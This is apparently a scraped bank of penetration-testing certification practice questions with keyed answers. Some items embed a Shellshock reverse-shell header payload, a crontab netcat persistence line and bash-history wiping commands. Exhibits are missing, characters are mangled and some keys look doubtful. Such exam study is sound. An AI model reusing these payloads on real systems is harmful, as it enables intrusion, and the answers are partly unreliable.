Practice

A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command: nmap -O -A -sS -p- 100.100.100.50Nmap returned that all 65,535 ports were filteredWhich of the following MOST likely occurred on the second scan? A. A firewall or IPS blocked the scan. B. The penetration tester used unsupported flags. C. The edge network device was disconnected. D. The scan returned ICMP echo replies.

A. A firewall or IPS blocked the scan.

Which of the following assessment methods is MOST likely to cause harm to an ICS environment? A. Active scanning B. Ping sweep C. Protocol reversing D. Packet analysis

A. Active scanning

Which of the following situations would MOST likely warrant revalidation of a previous security assessment? A. After detection of a breach B. After a merger or an acquisition C. When an organization updates its network firewall configurations D. When most of the vulnerabilities have been remediated

A. After detection of a breach

A penetration tester writes the following script:Which of the following objectives is the tester attempting to achieve? A. Determine active hosts on the network. B. Set the TTL of ping packets for stealth. C. Fill the ARP table of the networked devices. D. Scan the system on the most used ports.

A. Determine active hosts on the network.

A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position.Which of the following actions, if performed, would be ethical within the scope of the assessment? A. Exploiting a configuration weakness in the SQL database B. Intercepting outbound TLS traffic C. Gaining access to hosts by injecting malware into the enterprise-wide update server D. Leveraging a vulnerability on the internal CA to issue fraudulent client certificates E. Establishing and maintaining persistence on the domain controller

A. Exploiting a configuration weakness in the SQL database

A penetration tester runs the unshadow command on a machine.Which of the following tools will the tester most likely use NEXT? A. John the Ripper B. Hydra C. Mimikatz D. Cain and Abel

A. John the Ripper

An Nmap network scan has found five open ports with identified services. Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports? A. OpenVAS B. Drozer C. Burp Suite D. OWASP ZAP

A. OpenVAS

A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals.Which of the following should the tester do NEXT? A. Reach out to the primary point of contact. B. Try to take down the attackers. C. Call law enforcement officials immediately. D. Collect the proper evidence and add to the final report.

A. Reach out to the primary point of contact.

Which of the following protocols or technologies would in-transit confidentially protection for emailing the final security assessment report? A. S/MIME B. FTPS C. DNSSEC D. AS2

A. S/MIME

A penetration tester found the following valid URL while doing a manual assessment of a web application: http://www.example.com/product.php?id=123987.Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL? A. SQLmap B. Nessus C. Nikto D. DirBuster

A. SQLmap This url has an sql injection vulnerability

A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP.Which of the following steps should the tester take NEXT? A. Send deauthentication frames to the stations. B. Perform jamming on all 2.4GHz and 5GHz channels. C. Set the malicious AP to broadcast within dynamic frequency selection channels. D. Modify the malicious AP configuration to not use a preshared key.

A. Send deauthentication frames to the stations.

Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance? A. Shodan B. Nmap C. WebScarab-NG D. Nessus

A. Shodan

A penetration tester is cleaning up and covering tracks at the conclusion of a penetration test. Which of the following should the tester be sure to remove from the system? (Choose two.) A. Spawned shells B. Created user accounts C. Server logs D. Administrator accounts E. Reboot system F. ARP cache

A. Spawned shells B. Created user accounts

A penetration tester was able to gather MD5 hashes from a server and crack the hashes easily with rainbow tables.Which of the following should be included as a recommendation in the remediation report? A. Stronger algorithmic requirements B. Access controls on the server C. Encryption on the user passwords D. A patch management program

A. Stronger algorithmic requirements

Which of the following BEST describe the OWASP Top 10? (Choose two.) A. The most critical risks of web applications B. A list of all the risks of web applications C. The risks defined in order of importance D. A web-application security standard E. A risk-governance and compliance framework F. A checklist of Apache vulnerabilities

A. The most critical risks of web applications C. The risks defined in order of importance

After gaining access to a previous system, a penetration tester runs an Nmap scan against a network with the following results: The tester then runs the following command from the previous exploited system, which fails:Which of the following explains the reason why the command failed? A. The tester input the incorrect IP address. B. The command requires the ג€"port 135 option. C. An account for RDP does not exist on the server. D. PowerShell requires administrative privilege.

A. The tester input the incorrect IP address.

A penetration tester is explaining the MITRE ATT&CK framework to a company's chief legal counsel.Which of the following would the tester MOST likely describe as a benefit of the framework? A. Understanding the tactics of a security intrusion can help disrupt them. B. Scripts that are part of the framework can be imported directly into SIEM tools. C. The methodology can be used to estimate the cost of an incident better. D. The framework is static and ensures stability of a security program over time.

A. Understanding the tactics of a security intrusion can help disrupt them.

A company's Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi's router.Which of the following is MOST vulnerable to a brute-force attack? A. WPS B. WPA2-EAP C. WPA-TKIP D. WPA2-PSK

A. WPS

A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees' phone numbers on the company's website, the tester has learned the complete phone catalog was published there a few months ago.In which of the following places should the penetration tester look FIRST for the employees' numbers? A. Web archive B. GitHub C. File metadata D. Underground forums

A. Web archive

A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.Which of the following should the tester verify FIRST to assess this risk? A. Whether sensitive client data is publicly accessible B. Whether the connection between the cloud and the client is secure C. Whether the client's employees are trained properly to use the platform D. Whether the cloud applications were developed using a secure SDLC

A. Whether sensitive client data is publicly accessible

Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment? A. Whether the cloud service provider allows the penetration tester to test the environment B. Whether the specific cloud services are being used by the application C. The geographical location where the cloud services are running D. Whether the country where the cloud service is based has any impeding laws

A. Whether the cloud service provider allows the penetration tester to test the environment

A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations.Which of the following are considered passive reconnaissance tools? (Choose two.) A. Wireshark B. Nessus C. Retina D. Burp Suite E. Shodan F. Nikto

A. Wireshark E. Shodan Wireshark: It is considered a passive reconnaissance tool because it only captures and analyzes network traffic without actively trying to exploit vulnerabilities. Shodan: Shodan is a search engine that specializes in finding Internet-connected devices. It is considered a passive reconnaissance tool because it only searches for information that is publicly available on the Internet, without actively trying to exploit vulnerabilities.

Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner? A. chmod u+x script.sh B. chmod u+e script.sh C. chmod o+e script.sh D. chmod o+x script.sh

A. chmod u+x script.sh The chmod command is used to change the permissions of a file. In this case, the option u+x is used to grant execution permission to the file owner (u refers to the user/owner, and +x adds the execute permission).

The tester then edits a Python script that sends a web exploit and comes across the following code exploit = {`User-Agent`: `() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1`, `Accept`: `text/html,application/ xhtml+xml,application/xml`} Which of the following edits should the tester make to the script to determine the user context in which the server is being run? A. exploit = {ג€User-Agentג€: ג€() { ignored;};/bin/bash -i id;whoamiג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€} B. exploit = {ג€User-Agentג€: ג€() { ignored;};/bin/bash -i>& find / -perm -4000ג€, ג€Acceptג€: ג€text/h/xhtml +xml,application/xmlג€} C. exploit = {ג€User-Agentג€: ג€() { ignored;};/bin/sh -i ps -efג€ 0>&1ג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€} D. exploit = {ג€User-Agentג€: ג€() { ignored;};/bin/

A. exploit = {ג€User-Agentג€: ג€() { ignored;};/bin/bash -i id;whoamiג€, ג€Acceptג€: ג€text/html,application/xhtml +xml,application/xmlג€} The code in the script is creating a dictionary object called exploit which contains a key-value pair for the User-Agent and Accept headers. The value of the User-Agent key is a command that will execute a shell command to create a reverse shell and redirect its input and output to a specified IP and port.

A penetration tester logs in as a user in the cloud environment of a company.Which of the following Pacu modules will enable the tester to determine the level of access of the existing user? A. iam_enum_permissions B. iam_prive_sc_scan C. iam_backdoor_assume_role D. iam_bruteforce_permissions

A. iam_enum_permissions

A penetration tester is attempting to discover live hosts on a subnet quickly.Which of the following commands will perform a ping scan? A. nmap -sn 10.12.1.0/24 B. nmap -sV -A 10.12.1.0/24 C. nmap -Pn 10.12.1.0/24 D. nmap -sT -p- 10.12.1.0/24

A. nmap -sn 10.12.1.0/24 sn = ping scan

A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop.Which of the following can be used to ensure the tester is able to maintain access to the system? A. schtasks /create /sc /ONSTART /tr C:\Temp|WindowsUpdate.exe B. wmic startup get caption,command C. crontab -l; echo ג€@reboot sleep 200 && ncat -lvp 4242 -e /bin/bashג€) | crontab 2>/dev/null D. sudo useradd -ou 0 -g 0 user

A. schtasks /create /sc /ONSTART /tr C:\Temp|WindowsUpdate.exe

A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop. Which of the following can be used to ensure the tester is able to maintain access to the system? A. schtasks /create /sc /ONSTART /tr C:\Temp|WindowsUpdate.exe B. wmic startup get caption,command C. crontab -l; echo ג€@reboot sleep 200 && ncat -lvp 4242 -e /bin/bashג€) | crontab 2>/dev/null D. sudo useradd -ou 0 -g 0 user

A. schtasks /create /sc /ONSTART /tr C:\Temp|WindowsUpdate.exe Windows is sctasks - Crontab is Linux

A company has hired a penetration tester to deploy and set up a rogue access point on the network.Which of the following is the BEST tool to use to accomplish this goal? A. Wireshark B. Aircrack-ng C. Kismet D. Wifite

Aircrack-ng is a powerful suite of tools used for wireless penetration testing. It includes several utilities for capturing, monitoring, and analyzing Wi-Fi networks. One of the utilities in Aircrack-ng is "airbase-ng," which allows you to set up a rogue access point.

A penetration tester ran a simple Python-based scanner. The following is a snippet of the code: Which of the following BEST describes why this script triggered a `probable port scan` alert in the organization's IDS? A. sock.settimeout(20) on line 7 caused each next socket to be created every 20 milliseconds. B. *range(1, 1025) on line 1 populated the portList list in numerical order. C. Line 6 uses socket.SOCK_STREAM instead of socket.SOCK_DGRAM D. The remoteSvr variable has neither been type-hinted nor initialized.

B. *range(1, 1025) on line 1 populated the portList list in numerical order.

Which of the following would a company's hunt team be MOST interested in seeing in a final report? A. Executive summary B. Attack TTPs C. Methodology D. Scope details

B. Attack TTPs

A penetration tester has prepared the following phishing email for an upcoming penetration test:Which of the following is the penetration tester using MOST to influence phishing targets to click on the link? A. Familiarity and likeness B. Authority and urgency C. Scarcity and fear D. Social proof and greed

B. Authority and urgency

A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective? A. Wait for the next login and perform a downgrade attack on the server. B. Capture traffic using Wireshark. C. Perform a brute-force attack over the server. D. Use an FTP exploit against the server.

B. Capture traffic using Wireshark. FTP is in the clear, meaning unencrypted. FTPS is the secure version. Wireshark would capture the packets and you could see the clear text.

During a penetration test, a tester is in close proximity to a corporate mobile device belonging to a network administrator that is broadcasting Bluetooth frames.Which of the following is an example of a Bluesnarfing attack that the penetration tester can perform? A. Sniff and then crack the WPS PIN on an associated WiFi device. B. Dump the user address book on the device. C. Break a connection between two Bluetooth devices. D. Transmit text messages to the device.

B. Dump the user address book on the device. Bluesnarfing is a type of attack that involves unauthorized access to a Bluetooth-enabled device. One example of a Bluesnarfing attack is when an attacker accesses a mobile device and downloads the user's address book without their permission

A new client hired a penetration-testing company for a month-long contract for various security assessments against the client's new service. The client is expecting to make the new service publicly available shortly after the assessment is complete and is planning to fix any findings, except for critical issues, after the service is made public. The client wants a simple report structure and does not want to receive daily findings. Which of the following is most important for the penetration tester to define FIRST? A. Establish the format required by the client. B. Establish the threshold of risk to escalate to the client immediately. C. Establish the method of potential false positives. D. Establish the preferred day of the week for reporting.

B. Establish the threshold of risk to escalate to the client immediately.

A penetration tester utilized Nmap to scan host 64.13.134.52 and received the following results:Based on the output, which of the following services are MOST likely to be exploited? (Choose two.) A. Telnet B. HTTP C. SMTP D. DNS E. NTP F. SNMP

B. HTTP D. DNS

An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems.Which of the following is the penetration tester trying to accomplish? A. Uncover potential criminal activity based on the evidence gathered. B. Identify all the vulnerabilities in the environment. C. Limit invasiveness based on scope. D. Maintain confidentiality of the findings.

B. Identify all the vulnerabilities in the environment.

Which of the following provides an exploitation suite with payload modules that cover the broadest range of target system types? A. Nessus B. Metasploit C. Burp Suite D. Ethercap

B. Metasploit

A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability.Which of the following is the BEST way to ensure this is a true positive? A. Run another scanner to compare. B. Perform a manual test on the server. C. Check the results on the scanner. D. Look for the vulnerability online.

B. Perform a manual test on the server.

A penetration tester conducts an Nmap scan against a target and receives the following results: Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target? A. Nessus B. ProxyChains C. OWASP ZAP D. Empire

B. ProxyChains

During an engagement, a penetration tester found the following list of strings inside a file: random letters and numbers Which of the following is the BEST technique to determine the known plaintext of the strings? A. Dictionary attack B. Rainbow table attack C. Brute-force attack D. Credential-stuffing attack

B. Rainbow table attack

A final penetration test report has been submitted to the board for review and accepted. The report has three findings rated high. Which of the following should be the NEXT step? A. Perform a new penetration test. B. Remediate the findings. C. Provide the list of common vulnerabilities and exposures. D. Broaden the scope of the penetration test.

B. Remediate the findings.

A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client's building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet.Which of the following tools or techniques would BEST support additional reconnaissance? A. Wardriving B. Shodan C. Recon-ng D. Aircrack-ng

B. Shodan Shodan is a search engine for Internet-connected devices. It allows a user to search for specific types of devices or services, such as cameras, servers, or routers, connected to the Internet.

A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client's IP address. The tester later discovered the SOC had used sinkholing on the penetration tester's IP address.Which of the following MOST likely describes what happened? A. The penetration tester was testing the wrong assets. B. The planning process failed to ensure all teams were notified. C. The client was not ready for the assessment to start. D. The penetration tester had incorrect contact information.

B. The planning process failed to ensure all teams were notified.

A penetration tester received a .pcap file to look for credentials to use in an engagement.Which of the following tools should the tester utilize to open and read the .pcap file? A. Nmap B. Wireshark C. Metasploit D. Netcat

B. Wireshark

A penetration tester obtained the following results after scanning a web server using the dirb utility: Which of the following elements is MOST likely to contain useful information for the penetration tester? A. index.html B. about C. info D. home.html

B. about about had the largest size by a lot in the actual question

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:Which of the following commands should the penetration tester run post-engagement? A. grep -v apache ~/bash_history > ~/.bash_history B. rm -rf /tmp/apache C. chmod 600 /tmp/apache D. taskkill /IM ג€apacheג€ /F

B. rm -rf /tmp/apache This is to cover the tracks/logs after a successful break in.

A penetration tester gains access to a system and is able to migrate to a user process:Given the output above, which of the following actions is the penetration tester performing? (Choose two.) A. Redirecting output from a file to a remote system B. Building a scheduled task for execution C. Mapping a share to a remote system D. Executing a file on the remote system E. Creating a new process on all domain systems F. Setting up a reverse shell from a remote system G. Adding an additional IP address on the compromised system

C,D Net use s. That is mapping a share, then the file is copied and ran remotely.

Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement? A. Acceptance by the client and sign-off on the final report B. Scheduling of follow-up actions and retesting C. Attestation of findings and delivery of the report D. Review of the lessons during the engagement

C. Attestation of findings and delivery of the report

A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee's birthday, the tester gave the employee an external hard drive as a gift.Which of the following social-engineering attacks was the tester utilizing? A. Phishing B. Tailgating C. Baiting D. Shoulder surfing Reveal Solution

C. Baiting

A software company has hired a security consultant to assess the security of the company's software development practices. The consultant opts to begin reconnaissance by performing fuzzing on a software binary. Which of the following vulnerabilities is the security consultant MOST likely to identify? A. Weak authentication schemes B. Credentials stored in strings C. Buffer overflows D. Non-optimized resource management

C. Buffer overflows

A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid? A. PLCs will not act upon commands injected over the network. B. Supervisors and controllers are on a separate virtual network by default. C. Controllers will not validate the origin of commands. D. Supervisory systems will detect a malicious injection of code/commands.

C. Controllers will not validate the origin of commands.

A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet.Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid? A. PLCs will not act upon commands injected over the network. B. Supervisors and controllers are on a separate virtual network by default. C. Controllers will not validate the origin of commands. D. Supervisory systems will detect a malicious injection of code/commands.

C. Controllers will not validate the origin of commands. Many legacy industrial control systems (ICS) and supervisory control and data acquisition (SCADA) systems are not designed with security in mind and lack basic security features such as authentication and access controls. As a result, it is common for these systems to accept commands from any source without verifying their origin. This makes them vulnerable to attacks such as command injection, which can be used to disrupt or damage the systems they control.

A penetration tester gains access to a system and establishes persistence, and then run the following commands: cat /dev/null > temp touch - r .bash_history temp Which of the following actions is the tester MOST likely performing? A. Redirecting Bash history to /dev/null B. Making a copy of the user's Bash history to further enumeration C. Covering tracks by clearing the Bash history D. Making decoy files on the system to confuse incident responders

C. Covering tracks by clearing the Bash history "cat /dev/null > temp" - This command is used to clear the contents of a file called "temp". The contents of the special file "/dev/null" are redirected to "temp", which overwrites any existing data in the file and making the file empty. "touch -r .bash_history temp" - This command updates the timestamp of the file "temp" to match the timestamp of another file called ".bash_history". The "-r" option specifies that the timestamp of the file ".bash_history" is used to update the timestamp of the file "temp". "mv temp .bash_history" - This command renames or moves the file "temp" to ".bash_history". The file "temp" is no longer exist and a new file called ".bash_history" is created. If a file with the same name already exists, it will be overwritten by the file "temp".

A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:✑ Have a full TCP connection✑ Send a `hello` payload✑ Wait for a response✑ Send a string of characters longer than 16 bytesWhich of the following approaches would BEST support the objective? A. Run nmap -Pn -sV --script vuln <IP address>. B. Employ an OpenVAS simple scan against the TCP port of the host. C. Create a script in the Lua language and use it with NSE. D. Perform a credentialed scan with Nessus.

C. Create a script in the Lua language and use it with NSE.

A company becomes concerned when the security alarms are triggered during a penetration test.Which of the following should the company do NEXT? A. Halt the penetration test. B. Conduct an incident response. C. Deconflict with the penetration tester. D. Assume the alert is from the penetration test.

C. Deconflict with the penetration tester.

During a penetration test, a tester is able to change values in the URL from example.com/login.php?id=5 to example.com/login.php?id=10 and gain access to a web application. Which of the following vulnerabilities has the penetration tester exploited? A. Command injection B. Broken authentication C. Direct object reference D. Cross-site scripting

C. Direct object reference

A penetration tester discovered a vulnerability that provides the ability to upload to a path via discovery traversal. Some of the files that were discovered through this vulnerability are:Which of the following is the BEST method to help an attacker gain internal access to the affected machine? A. Edit the discovered file with one line of code for remote callback. B. Download .pl files and look for usernames and passwords. C. Edit the smb.conf file and upload it to the server. D. Download the smb.conf file and look at configurations

C. Edit the smb.conf file and upload it to the server. By editing the smb.conf file (smb is short for Server Message Block, a protocol for sharing files, printers, serial ports, and communications abstractions such as named pipes and mail slots between computers) and uploading it to the server, an attacker can modify the configurations of the SMB service and potentially gain internal access to the affected machine.

A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment? A. Smurf B. Ping flood C. Fraggle D. Ping of death Reveal Solution

C. Fraggle If ICMP (Internet Control Message Protocol) is disabled on a network segment, it would mean that ICMP-based attacks, like ping flood (option B) and ping of death (option D), would not be effective. ICMP is used in these attacks, and with it disabled, they wouldn't work on that segment. A Fraggle attack is similar to a Smurf attack but uses UDP (User Datagram Protocol) rather than ICMP.

The following line-numbered Python code snippet is being used in reconnaissance: Which of the following line numbers from the script MOST likely contributed to the script triggering a `probable port scan` alert in the organization's IDS? A. Line 01 B. Line 02 C. Line 07 D. Line 08 E. Line 12

C. Line 07

A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running.Which of the following would BEST support this task? A. Run nmap with the -O, -p22, and -sC options set against the target. B. Run nmap with the -sV and -p22 options set against the target. C. Run nmap with the --script vulners option set against the target. D. Run nmap with the -sA option set against the target.

C. Run nmap with the --script vulners option set against the target.

A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company's employees.Which of the following tools can help the tester achieve this goal? A. Metasploit B. Hydra C. SET D. WPScan

C. SET Social Engineering Toolkit is a way to test your employees security awareness.

Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester? A. NDA B. MSA C. SOW D. MOU

C. SOW

A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds? A. Nmap B. tcpdump C. Scapy D. hping3

C. Scapy Scapy is a powerful packet manipulation tool that allows users to craft, send, and receive custom TCP packets. It can be used to manipulate the TCP headers and to observe the response from the proprietary service.

A penetration tester has established an on-path attack position and must now specially craft a DNS query response to be sent back to a target host. Which of the following utilities would BEST support this objective? A. Socat B. tcpdump C. Scapy D. dig

C. Scapy Use Scapy to craft and inject malicious packets into the network, such as ARP spoofing or DNS poisoning.

A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.Which of the following is the BEST action for the penetration tester to take? A. Utilize the tunnel as a means of pivoting to other internal devices. B. Disregard the IP range, as it is out of scope. C. Stop the assessment and inform the emergency contact. D. Scan the IP range for additional systems to exploit.

C. Stop the assessment and inform the emergency contact.

A consulting company is completing the ROE during scoping.Which of the following should be included in the ROE? A. Cost of the assessment B. Report distribution C. Testing restrictions D. Liability

C. Testing restrictions

A Chief Information Security Officer wants a penetration tester to evaluate whether a recently installed firewall is protecting a subnetwork on which many decades- old legacy systems are connected. The penetration tester decides to run an OS discovery and a full port scan to identify all the systems and any potential vulnerability. Which of the following should the penetration tester consider BEFORE running a scan? A. The timing of the scan B. The bandwidth limitations C. The inventory of assets and versions D. The type of scan

C. The inventory of assets and versions

Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz. * on a Windows server that the tester compromised? A. To remove hash-cracking registry entries B. To remove the tester-created Mimikatz account C. To remove tools from the server D. To remove a reverse shell from the system

C. To remove tools from the server The command `sdelete` is a command-line utility that can be used to securely delete files and cleanse free space on a disk in Windows. `Mimikatz` is a well-known tool used by attackers (and penetration testers) to extract plaintext passwords, hash, PIN code, and Kerberos tickets from memory. In the context of the given command `sdelete mimikatz.*`, the intention is to securely delete all files related to Mimikatz from the compromised server.

A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test.Which of the following describes the scope of the assessment? A. Partially known environment testing B. Known environment testing C. Unknown environment testing D. Physical environment testing

C. Unknown environment testing

A penetration tester is exploring a client's website. The tester performs a curl command and obtains the following: http/ 1.1 wordpress Which of the following tools would be BEST for the penetration tester to use to explore this site further? A. Burp Suite B. DirBuster C. WPScan D. OWASP ZAP

C. WPScan

Appending string values onto another string is called: A. compilation B. connection C. concatenation D. conjunction

C. concatenation

A compliance-based penetration test is primarily concerned with: A. obtaining PII from the protected network. B. bypassing protection on edge devices. C. determining the efficacy of a specific set of security standards. D. obtaining specific information from the protected network.

C. determining the efficacy of a specific set of security standards.

A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internalSendmail server. To remain stealthy, the tester ran the following command from the attack machine:Which of the following would be the BEST command to use for further progress into the targeted network? A. nc 10.10.1.2 B. ssh 10.10.1.2 C. nc 127.0.0.1 5555 D. ssh 127.0.0.1 5555

C. nc 127.0.0.1 5555

A penetration tester wants to scan a target network without being detected by the client's IDS.Which of the following scans is MOST likely to avoid detection? A. nmap -P0 -T0 -sS 192.168.1.10 B. nmap -sA -sV --host-timeout 60 192.168.1.10 C. nmap -f --badsum 192.168.1.10 D. nmap -A -n 192.168.1.10

C. nmap -f --badsum 192.168.1.10 he option "nmap -f --badsum 192.168.1.10" is most likely to avoid detection by the client's IDS. The -f option allows nmap to send fragments of packets with bad checksums, which can cause some IDS to ignore the traffic.

A penetration tester is scanning a corporate lab network for potentially vulnerable services.Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker? A. nmap 192.168.1.1-5 -PU22-25,80 B. nmap 192.168.1.1-5 -PA22-25,80 C. nmap 192.168.1.1-5 -PS22-25,80 D. nmap 192.168.1.1-5 -Ss22-25,80

C. nmap 192.168.1.1-5 -PS22-25,80

An assessor wants to run an Nmap scan as quietly as possible. Which of the following commands will give the LEAST chance of detection? A. nmap ג€"T3 192.168.0.1 B. nmap ג€"P0 192.168.0.1 C. nmap ג€"T0 192.168.0.1 D. nmap ג€"A 192.168.0.1

C. nmap ג€"T0 192.168.0.1 -T0 Paranoid: Very slow, used for IDS evasion -T1 Sneaky: Quite slow, used for IDS evasion -T2 Polite: Slows down to consume less bandwidth, runs ~10 times slower than default -T3 Normal: Default, a dynamic timing model based on target responsiveness -T4 Aggressive: Assumes a fast and reliable network and may overwhelm targets -T5 Insane: Very aggressive; will likely overwhelm targets or miss open ports

Which of the following expressions in Python increase a variable val by one? (Choose two.) A. val++ B. +val C. val=(val+1) D. ++val E. val=val++ F. val+=1

C. val=(val+1) F. val+=1

A penetration tester is conducting an authorized, physical penetration test to attempt to enter a client's building during non-business hours. Which of the following are MOST important for the penetration tester to have during the test? (Choose two.) A. A handheld RF spectrum analyzer B. A mask and personal protective equipment C. Caution tape for marking off insecure areas D. A dedicated point of contact at the client E. The paperwork documenting the engagement F. Knowledge of the building's normal business hours

D. A dedicated point of contact at the client E. The paperwork documenting the engagement

A consultant is reviewing the following output after reports of intermittent connectivity issues:Which of the following is MOST likely to be reported by the consultant? A. A device on the network has an IP address in the wrong subnet. B. A multicast session was initiated using the wrong multicast group. C. An ARP flooding attack is using the broadcast address to perform DDoS. D. A device on the network has poisoned the ARP cache.

D. A device on the network has poisoned the ARP cache.

Which of the following is MOST important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience? A. Executive summary of the penetration-testing methods used B. Bill of materials including supplies, subcontracts, and costs incurred during assessment C. Quantitative impact assessments given a successful software compromise D. Code context for instances of unsafe typecasting operations

D. Code context for instances of unsafe typecasting operations

A penetration tester discovers a web server that is within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT? A. Forensically acquire the backdoor Trojan and perform attribution. B. Utilize the backdoor in support of the engagement. C. Continue the engagement and include the backdoor finding in the final report. D. Inform the customer immediately about the backdoor.

D. Inform the customer immediately about the backdoor.

A penetration tester has been given eight business hours to gain access to a client's financial system.Which of the following techniques will have the HIGHEST likelihood of success? A. Attempting to tailgate an employee who is going into the client's workplace B. Dropping a malicious USB key with the company's logo in the parking lot C. Using a brute-force attack against the external perimeter to gain a foothold D. Performing spear phishing against employees by posing as senior management

D. Performing spear phishing against employees by posing as senior management

A penetration tester ran the following commands on a Windows server:Which of the following should the tester do AFTER delivering the final report? A. Delete the scheduled batch job. B. Close the reverse shell connection. C. Downgrade the svsaccount permissions. D. Remove the tester-created credentials.

D. Remove the tester-created credentials.

A penetration tester writes the following script:Which of the following is the tester performing? A. Searching for service vulnerabilities B. Trying to recover a lost bind shell C. Building a reverse shell listening on specified ports D. Scanning a network for specific open ports

D. Scanning a network for specific open ports

A company uses a cloud provider with shared network bandwidth to host a web application on dedicated servers. The company's contact with the cloud provider prevents any activities that would interfere with the cloud provider's other customers. When engaging with a penetration-testing company to test the application, which of the following should the company avoid? A. Crawling the web application's URLs looking for vulnerabilities B. Fingerprinting all the IP addresses of the application's servers C. Brute forcing the application's passwords D. Sending many web requests per second to test DDoS protection

D. Sending many web requests per second to test DDoS protection

A penetration tester downloaded a Java application file from a compromised web server and identifies how to invoke it by looking at the following log: Which of the following is the order of steps the penetration tester needs to follow to validate whether the Java application uses encryption over sockets? A. Run an application vulnerability scan and then identify the TCP ports used by the application. B. Run the application attached to a debugger and then review the application's log. C. Disassemble the binary code and then identify the break points. D. Start a packet capture with Wireshark and then run the application.

D. Start a packet capture with Wireshark and then run the application. To validate whether the Java application uses encryption over sockets, the penetration tester needs to capture and analyze network traffic using a tool like Wireshark. By capturing the traffic, the tester can inspect the packets to see if the data is being sent in plaintext or if it is encrypted. This method does not require any modification of the application itself, making it a non-intrusive approach.

A penetration tester who is doing a company-requested assessment would like to send traffic to another system suing double tagging.Which of the following techniques would BEST accomplish this goal? A. RFID cloning B. RFID tagging C. Meta tagging D. Tag nesting

D. Tag nesting

Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet? A. Unsupported operating systems B. Susceptibility to DDoS attacks C. Inability to network D. The existence of default passwords

D. The existence of default passwords

Which of the following situations would require a penetration tester to notify the emergency contact for the engagement? A. The team exploits a critical server within the organization. B. The team exfiltrates PII or credit card data from the organization. C. The team loses access to the network remotely. D. The team discovers another actor on a system on the network.

D. The team discovers another actor on a system on the network.

A penetration tester was brute forcing an internal web server and ran a command that produced the following output: However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed.Which of the following is the MOST likely reason for the lack of output? A. The HTTP port is not open on the firewall. B. The tester did not run sudo before the command. C. The web server is using HTTPS instead of HTTP. D. This URI returned a server error.

D. This URI returned a server error. the 500 code is a server side error code meaning the correct answer is D.

A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data.Which of the following was captured by the testing team? A. Multiple handshakes B. IP addresses C. Encrypted file transfers D. User hashes sent over SMB

D. User hashes sent over SMB A toolkit to respond to NetBIOS name service queries for file server service requests using the Server Message Block (SMB) protocol.

A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server.Which of the following can be done with the pcap to gain access to the server? A. Perform vertical privilege escalation. B. Replay the captured traffic to the server to recreate the session. C. Use John the Ripper to crack the password. D. Utilize a pass-the-hash attack.

